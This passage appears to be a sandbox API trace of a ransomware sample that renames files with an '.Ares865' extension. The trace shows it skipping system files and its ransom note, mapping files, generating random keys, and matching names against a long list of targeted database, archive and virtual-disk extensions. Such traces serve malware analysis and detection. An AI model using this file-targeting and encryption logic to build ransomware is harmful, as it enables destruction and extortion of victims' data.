(lpString1="ns-ms", lpString2="xmlff") returned -1 [0059.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.Ares865") returned 94 [0059.914] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default user\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), lpNewFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0059.918] CreateFileW (lpFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0059.918] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0059.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0059.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0059.918] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0059.919] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.919] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.919] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x164 [0059.926] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0059.927] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0059.928] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.928] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.928] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.928] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.930] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.930] CloseHandle (hObject=0x164) returned 1 [0059.930] CloseHandle (hObject=0x15c) returned 1 [0059.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0059.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0059.931] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xc67cc5, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x3c12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="aoldtz.exe") returned -1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".") returned 1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="..") returned 1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="windows") returned -1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="bootmgr") returned -1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="temp") returned -1 [0059.931] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="pagefile.sys") returned -1 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="boot") returned -1 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="ids.txt") returned -1 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="perflogs") returned -1 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="MSBuild") returned -1 [0059.932] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0059.932] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms") returned 86 [0059.932] lstrcpyW (in: lpString1=0x2cce460, lpString2="5afe4de1b92fc382.customDestinations-ms" | out: lpString1="5afe4de1b92fc382.customDestinations-ms") returned="5afe4de1b92fc382.customDestinations-ms" [0059.932] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0059.932] lstrlenW (lpString="Ares865") returned 7 [0059.932] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0059.932] lstrlenW (lpString=".dll") returned 4 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".dll") returned 1 [0059.932] lstrlenW (lpString=".lnk") returned 4 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".lnk") returned 1 [0059.932] lstrlenW (lpString=".ini") returned 4 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".ini") returned 1 [0059.932] lstrlenW (lpString=".sys") returned 4 [0059.932] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".sys") returned 1 [0059.932] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0059.932] lstrlenW (lpString="bak") returned 3 [0059.932] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0059.932] lstrlenW (lpString="ba_") returned 3 [0059.932] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0059.932] lstrlenW (lpString="dbb") returned 3 [0059.932] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0059.932] lstrlenW (lpString="vmdk") returned 4 [0059.932] lstrcmpiW (lpString1="s-ms", lpString2="vmdk") returned -1 [0059.932] lstrlenW (lpString="rar") returned 3 [0059.932] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0059.932] lstrlenW (lpString="zip") returned 3 [0059.932] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0059.932] lstrlenW (lpString="tgz") returned 3 [0059.932] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0059.932] lstrlenW (lpString="vbox") returned 4 [0059.932] lstrcmpiW (lpString1="s-ms", lpString2="vbox") returned -1 [0059.933] lstrlenW (lpString="vdi") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0059.933] lstrlenW (lpString="vhd") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0059.933] lstrlenW (lpString="vhdx") returned 4 [0059.933] lstrcmpiW (lpString1="s-ms", lpString2="vhdx") returned -1 [0059.933] lstrlenW (lpString="avhd") returned 4 [0059.933] lstrcmpiW (lpString1="s-ms", lpString2="avhd") returned 1 [0059.933] lstrlenW (lpString="db") returned 2 [0059.933] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0059.933] lstrlenW (lpString="db2") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0059.933] lstrlenW (lpString="db3") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0059.933] lstrlenW (lpString="dbf") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0059.933] lstrlenW (lpString="mdf") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0059.933] lstrlenW (lpString="mdb") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0059.933] lstrlenW (lpString="sql") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0059.933] lstrlenW (lpString="sqlite") returned 6 [0059.933] lstrcmpiW (lpString1="ons-ms", lpString2="sqlite") returned -1 [0059.933] lstrlenW (lpString="sqlite3") returned 7 [0059.933] lstrcmpiW (lpString1="ions-ms", lpString2="sqlite3") returned -1 [0059.933] lstrlenW (lpString="sqlitedb") returned 8 [0059.933] lstrcmpiW (lpString1="tions-ms", lpString2="sqlitedb") returned 1 [0059.933] lstrlenW (lpString="xml") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0059.933] lstrlenW (lpString="$er") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0059.933] lstrlenW (lpString="4dd") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0059.933] lstrlenW (lpString="4dl") returned 3 [0059.933] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0059.933] lstrlenW (lpString="^^^") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0059.934] lstrlenW (lpString="abs") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0059.934] lstrlenW (lpString="abx") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0059.934] lstrlenW (lpString="accdb") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accdb") returned 1 [0059.934] lstrlenW (lpString="accdc") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accdc") returned 1 [0059.934] lstrlenW (lpString="accde") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accde") returned 1 [0059.934] lstrlenW (lpString="accdr") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accdr") returned 1 [0059.934] lstrlenW (lpString="accdt") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accdt") returned 1 [0059.934] lstrlenW (lpString="accdw") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accdw") returned 1 [0059.934] lstrlenW (lpString="accft") returned 5 [0059.934] lstrcmpiW (lpString1="ns-ms", lpString2="accft") returned 1 [0059.934] lstrlenW (lpString="adb") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.934] lstrlenW (lpString="adb") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.934] lstrlenW (lpString="ade") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0059.934] lstrlenW (lpString="adf") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0059.934] lstrlenW (lpString="adn") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0059.934] lstrlenW (lpString="adp") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0059.934] lstrlenW (lpString="alf") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0059.934] lstrlenW (lpString="ask") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0059.934] lstrlenW (lpString="btr") returned 3 [0059.934] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0059.935] lstrlenW (lpString="cat") returned 3 [0059.935] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0059.935] lstrlenW (lpString="cdb") returned 3 [0059.935] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0059.936] lstrlenW (lpString="ckp") returned 3 [0059.936] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0059.936] lstrlenW (lpString="cma") returned 3 [0059.936] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0059.936] lstrlenW (lpString="cpd") returned 3 [0059.936] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0059.936] lstrlenW (lpString="dacpac") returned 6 [0059.936] lstrcmpiW (lpString1="ons-ms", lpString2="dacpac") returned 1 [0059.936] lstrlenW (lpString="dad") returned 3 [0059.936] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0059.936] lstrlenW (lpString="dadiagrams") returned 10 [0059.936] lstrcmpiW (lpString1="nations-ms", lpString2="dadiagrams") returned 1 [0059.936] lstrlenW (lpString="daschema") returned 8 [0059.936] lstrcmpiW (lpString1="tions-ms", lpString2="daschema") returned 1 [0059.936] lstrlenW (lpString="db-journal") returned 10 [0059.936] lstrcmpiW (lpString1="nations-ms", lpString2="db-journal") returned 1 [0059.936] lstrlenW (lpString="db-shm") returned 6 [0059.936] lstrcmpiW (lpString1="ons-ms", lpString2="db-shm") returned 1 [0059.936] lstrlenW (lpString="db-wal") returned 6 [0059.936] lstrcmpiW (lpString1="ons-ms", lpString2="db-wal") returned 1 [0059.937] lstrlenW (lpString="dbc") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0059.937] lstrlenW (lpString="dbs") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0059.937] lstrlenW (lpString="dbt") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0059.937] lstrlenW (lpString="dbv") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0059.937] lstrlenW (lpString="dbx") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0059.937] lstrlenW (lpString="dcb") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0059.937] lstrlenW (lpString="dct") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0059.937] lstrlenW (lpString="dcx") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0059.937] lstrlenW (lpString="ddl") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0059.937] lstrlenW (lpString="dlis") returned 4 [0059.937] lstrcmpiW (lpString1="s-ms", lpString2="dlis") returned 1 [0059.937] lstrlenW (lpString="dp1") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0059.937] lstrlenW (lpString="dqy") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0059.937] lstrlenW (lpString="dsk") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0059.937] lstrlenW (lpString="dsn") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0059.937] lstrlenW (lpString="dtsx") returned 4 [0059.937] lstrcmpiW (lpString1="s-ms", lpString2="dtsx") returned 1 [0059.937] lstrlenW (lpString="dxl") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0059.937] lstrlenW (lpString="eco") returned 3 [0059.937] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0059.937] lstrlenW (lpString="ecx") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0059.938] lstrlenW (lpString="edb") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0059.938] lstrlenW (lpString="epim") returned 4 [0059.938] lstrcmpiW (lpString1="s-ms", lpString2="epim") returned 1 [0059.938] lstrlenW (lpString="fcd") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0059.938] lstrlenW (lpString="fdb") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0059.938] lstrlenW (lpString="fic") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0059.938] lstrlenW (lpString="flexolibrary") returned 12 [0059.938] lstrcmpiW (lpString1="tinations-ms", lpString2="flexolibrary") returned 1 [0059.938] lstrlenW (lpString="fm5") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0059.938] lstrlenW (lpString="fmp") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0059.938] lstrlenW (lpString="fmp12") returned 5 [0059.938] lstrcmpiW (lpString1="ns-ms", lpString2="fmp12") returned 1 [0059.938] lstrlenW (lpString="fmpsl") returned 5 [0059.938] lstrcmpiW (lpString1="ns-ms", lpString2="fmpsl") returned 1 [0059.938] lstrlenW (lpString="fol") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0059.938] lstrlenW (lpString="fp3") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0059.938] lstrlenW (lpString="fp4") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0059.938] lstrlenW (lpString="fp5") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0059.938] lstrlenW (lpString="fp7") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0059.938] lstrlenW (lpString="fpt") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0059.938] lstrlenW (lpString="frm") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0059.938] lstrlenW (lpString="gdb") returned 3 [0059.938] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.939] lstrlenW (lpString="gdb") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.939] lstrlenW (lpString="grdb") returned 4 [0059.939] lstrcmpiW (lpString1="s-ms", lpString2="grdb") returned 1 [0059.939] lstrlenW (lpString="gwi") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0059.939] lstrlenW (lpString="hdb") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0059.939] lstrlenW (lpString="his") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0059.939] lstrlenW (lpString="ib") returned 2 [0059.939] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0059.939] lstrlenW (lpString="idb") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0059.939] lstrlenW (lpString="ihx") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0059.939] lstrlenW (lpString="itdb") returned 4 [0059.939] lstrcmpiW (lpString1="s-ms", lpString2="itdb") returned 1 [0059.939] lstrlenW (lpString="itw") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0059.939] lstrlenW (lpString="jet") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0059.939] lstrlenW (lpString="jtx") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0059.939] lstrlenW (lpString="kdb") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0059.939] lstrlenW (lpString="kexi") returned 4 [0059.939] lstrcmpiW (lpString1="s-ms", lpString2="kexi") returned 1 [0059.939] lstrlenW (lpString="kexic") returned 5 [0059.939] lstrcmpiW (lpString1="ns-ms", lpString2="kexic") returned 1 [0059.939] lstrlenW (lpString="kexis") returned 5 [0059.939] lstrcmpiW (lpString1="ns-ms", lpString2="kexis") returned 1 [0059.939] lstrlenW (lpString="lgc") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0059.939] lstrlenW (lpString="lwx") returned 3 [0059.939] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0059.939] lstrlenW (lpString="maf") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0059.940] lstrlenW (lpString="maq") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0059.940] lstrlenW (lpString="mar") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0059.940] lstrlenW (lpString="marshal") returned 7 [0059.940] lstrcmpiW (lpString1="ions-ms", lpString2="marshal") returned -1 [0059.940] lstrlenW (lpString="mas") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0059.940] lstrlenW (lpString="mav") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0059.940] lstrlenW (lpString="maw") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0059.940] lstrlenW (lpString="mdbhtml") returned 7 [0059.940] lstrcmpiW (lpString1="ions-ms", lpString2="mdbhtml") returned -1 [0059.940] lstrlenW (lpString="mdn") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0059.940] lstrlenW (lpString="mdt") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0059.940] lstrlenW (lpString="mfd") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0059.940] lstrlenW (lpString="mpd") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0059.940] lstrlenW (lpString="mrg") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0059.940] lstrlenW (lpString="mud") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0059.940] lstrlenW (lpString="mwb") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0059.940] lstrlenW (lpString="myd") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0059.940] lstrlenW (lpString="ndf") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0059.940] lstrlenW (lpString="nnt") returned 3 [0059.940] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0059.940] lstrlenW (lpString="nrmlib") returned 6 [0059.940] lstrcmpiW (lpString1="ons-ms", lpString2="nrmlib") returned 1 [0059.941] lstrlenW (lpString="ns2") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0059.941] lstrlenW (lpString="ns3") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0059.941] lstrlenW (lpString="ns4") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0059.941] lstrlenW (lpString="nsf") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0059.941] lstrlenW (lpString="nv") returned 2 [0059.941] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0059.941] lstrlenW (lpString="nv2") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0059.941] lstrlenW (lpString="nwdb") returned 4 [0059.941] lstrcmpiW (lpString1="s-ms", lpString2="nwdb") returned 1 [0059.941] lstrlenW (lpString="nyf") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0059.941] lstrlenW (lpString="odb") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.941] lstrlenW (lpString="odb") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.941] lstrlenW (lpString="oqy") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0059.941] lstrlenW (lpString="ora") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0059.941] lstrlenW (lpString="orx") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0059.941] lstrlenW (lpString="owc") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0059.941] lstrlenW (lpString="p96") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0059.941] lstrlenW (lpString="p97") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0059.941] lstrlenW (lpString="pan") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0059.941] lstrlenW (lpString="pdb") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0059.941] lstrlenW (lpString="pdm") returned 3 [0059.941] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0059.942] lstrlenW (lpString="pnz") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0059.942] lstrlenW (lpString="qry") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0059.942] lstrlenW (lpString="qvd") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0059.942] lstrlenW (lpString="rbf") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0059.942] lstrlenW (lpString="rctd") returned 4 [0059.942] lstrcmpiW (lpString1="s-ms", lpString2="rctd") returned 1 [0059.942] lstrlenW (lpString="rod") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0059.942] lstrlenW (lpString="rodx") returned 4 [0059.942] lstrcmpiW (lpString1="s-ms", lpString2="rodx") returned 1 [0059.942] lstrlenW (lpString="rpd") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0059.942] lstrlenW (lpString="rsd") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0059.942] lstrlenW (lpString="sas7bdat") returned 8 [0059.942] lstrcmpiW (lpString1="tions-ms", lpString2="sas7bdat") returned 1 [0059.942] lstrlenW (lpString="sbf") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0059.942] lstrlenW (lpString="scx") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0059.942] lstrlenW (lpString="sdb") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0059.942] lstrlenW (lpString="sdc") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0059.942] lstrlenW (lpString="sdf") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0059.942] lstrlenW (lpString="sis") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0059.942] lstrlenW (lpString="spq") returned 3 [0059.942] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0059.942] lstrlenW (lpString="te") returned 2 [0059.942] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0059.943] lstrlenW (lpString="teacher") returned 7 [0059.943] lstrcmpiW (lpString1="ions-ms", lpString2="teacher") returned -1 [0059.943] lstrlenW (lpString="tmd") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="tmd") 